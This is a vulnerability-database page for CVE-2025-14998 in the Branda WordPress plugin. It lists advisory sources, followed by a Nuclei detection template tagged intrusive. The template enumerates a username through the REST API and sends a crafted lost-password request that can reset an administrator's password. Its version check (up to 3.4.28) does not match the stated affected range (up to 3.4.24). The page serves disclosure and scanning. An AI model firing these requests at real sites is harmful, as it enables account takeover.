Branda WordPress plugin - Privilege Escalation
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2025-14998 | 2 Jan 202603:43 | – | circl | |
| WordPress plugin Branda 安全漏洞 | 2 Jan 202600:00 | – | cnnvd | |
| CVE-2025-14998 | 2 Jan 202601:48 | – | cve | |
| CVE-2025-14998 Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - Unauthenticated Privilege Escalation via Account Takeover | 2 Jan 202601:48 | – | cvelist | |
| EUVD-2026-0716 | 2 Jan 202601:48 | – | euvd | |
| CVE-2025-14998 | 2 Jan 202603:15 | – | nvd | |
| 📄 WordPress Branda 3.4.24 Privilege Escalation | 5 Jan 202600:00 | – | packetstorm | |
| WordPress Branda - White Label & Branding, Free Login Page Customizer plugin <= 3.4.24 - Unauthenticated Privilege Escalation via Account Takeover vulnerability | 2 Jan 202607:34 | – | patchstack | |
| PT-2026-1041 | 2 Jan 202600:00 | – | ptsecurity | |
| CVE-2025-14998 | 3 Jan 202602:22 | – | redhatcve |
10
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2025-14998 |
id: CVE-2025-14998
info:
name: Branda WordPress plugin - Privilege Escalation
author: theamanrawat
severity: critical
description: |
Branda WordPress plugin <= 3.4.24 contains a privilege escalation caused by improper user identity validation in password update functionality, letting unauthenticated attackers change arbitrary user passwords, including administrators, exploit requires crafted request.
impact: |
Unauthenticated attackers can change any user's password, including administrators, leading to full account takeover and privilege escalation.
remediation: |
Update to a version later than 3.4.24 or the latest available version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-14998
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-14998
cwe-id: CWE-639
metadata:
verified: true
max-request: 7
tags: cve,cve2025,wordpress,wp-plugin,branda,intrusive
variables:
rp_token: "{{rand_text_alphanumeric(20)}}"
rp_control: "{{rand_text_alphanumeric(20)}}"
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/branda-white-labeling/readme.txt"
matchers:
- type: word
part: body
words:
- "Branda"
internal: true
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- "(?i)Stable tag: ([0-9.]+)"
internal: true
- method: GET
path:
- "{{BaseURL}}/?rest_route=/wp/v2/users&per_page=1"
matchers:
- type: dsl
dsl:
- 'status_code == 200 && contains(body, "\"slug\"")'
internal: true
extractors:
- type: json
name: wp_user
part: body
json:
- ".[0].slug"
internal: true
- raw:
- |
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user_login={{wp_user}}&redirect_to=&password_1={{rp_token}}&wp-submit=Get+New+Password
- |
GET /wp-login.php?action=rp&key={{rp_control}}&login={{wp_user}} HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-login.php?action=rp HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-login.php?action=rp&key={{rp_token}}&login={{wp_user}} HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-login.php?action=rp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(header_3, "invalidkey") || contains(header_3, "expiredkey")'
- 'status_code_5 == 200'
- 'contains(body_5, "resetpassform") || contains(body_5, "rp_key")'
- '!contains(body_5, "invalidkey")'
- 'compare_versions(version, "<= 3.4.28")'
condition: and
# digest: 4a0a0047304502210094d0071f18fbe1897ff221838f7b2c04028e638980a28e734fc1d0460d40672302206af814344dfc7f5d48eb7a9105f9a6f97cc642245af2f83d1313aada99f259fa:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Aug 2026 10:02Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.19.8
EPSS0.00563
SSVC